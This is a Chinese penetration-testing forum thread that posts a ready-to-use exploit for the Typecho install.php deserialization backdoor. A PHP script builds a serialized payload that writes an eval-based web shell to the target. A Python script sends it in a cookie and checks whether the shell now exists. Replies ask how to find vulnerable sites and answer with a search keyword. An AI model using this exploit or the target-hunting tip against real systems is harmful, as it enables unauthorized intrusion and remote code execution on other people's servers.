Typecho预留install.php后门利用exp

渗透测试相关
#1

exp.php:

<?php

/**
* Created by PhpStorm.
* User: RaI4over
* Date: 2017/10/19
* Time: 15:17
* 生成 _typecho_config 的值
*/
class Typecho_Feed
{
    const RSS2 = 'RSS 2.0';
    private $_type;
    private $_charset;
    private $_lang;
    private $_items = array();

    public function __construct($version, $type = self::RSS2, $charset = 'UTF-8', $lang = 'en')
    {
        $this->_version = $version;
        $this->_type = $type;
        $this->_charset = $charset;
        $this->_lang = $lang;
    }

    public function addItem(array $item)
    {
        $this->_items[] = $item;
    }
}

class Typecho_Request
{
    private $_params = array('screenName'=>'fputs(fopen(\'./a.php\',\'w\'),\'<?php @eval($_POST[minty]);?>\')');
    private $_filter = array('assert');
    //private $_filter = array('assert', array('Typecho_Response', 'redirect'));

}

$payload1 = new Typecho_Feed(5, 'ATOM 1.0');
$payload2 = new Typecho_Request();
$payload1->addItem(array('author' => $payload2));
$exp['adapter'] = $payload1;
$exp['prefix'] = 'MxxY';
echo base64_encode(serialize($exp));

exp.py:

import requests
import os

if __name__ == '__main__':
    print ''' ____          ____      _ _  _
| __ ) _  _  |  _ \ __ _(_) || |  _____  _____ _ __
|  _ \| | | |  | |_) / _` | | || |_ / _ \ \ / / _ \ '__|
| |_) | |_| |  |  _ < (_| | |__  _| (_) \ V /  __/ |
|____/ \__, |  |_| \_\__,_|_|  |_|  \___/ \_/ \___|_|
      |___/
    '''

    targert_url = 'https://xxxxx';

    rsp = requests.get(targert_url + "/install.php");
    if rsp.status_code != 200:
        exit('The attack failed and the problem file does not exist !!!')
    else:
        print 'You are lucky, the problem file exists, immediately attack !!!'

    proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080", }

    typecho_config = os.popen('php exp.php').read()

    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0',
              'Cookie': 'antispame=1508415662; antispamkey=cc7dffeba8d48da508df125b5a50edbd; PHPSESSID=po1hggbeslfoglbvurjjt2lcg0; __typecho_lang=zh_CN;__typecho_config={typecho_config};'.format(typecho_config=typecho_config),
              'Referer': targert_url}

    url = targert_url + "/install.php?finish=1"

    requests.get(url,headers=headers,allow_redirects=False)

    shell_url = targert_url + '/a.php'
    if requests.get(shell_url).status_code == 200:
        print 'shell_url: ' + shell_url
    else:
        print "Getshell Fail!"
  • 将exp.php和exp.py放至同级目录,修改exp.py中的target_url为目标url
  • 一句话木马内容和路径可在exp.php中修改,修改后同样需要修改exp.py中的路径

另外

我在尝试修改exp时,想不使用php去获得payload,于是将执行php exp.php之后输出的base64编码还原为原文,但是在再次使用base64进行编码的时候发现编码后的base64值与之前的不一致,不知道为什么

#2

找这种站的关键字是什么啊??

#3

powered by typecho

服务器资源由ZeptoVM赞助

Partners Wiki Discord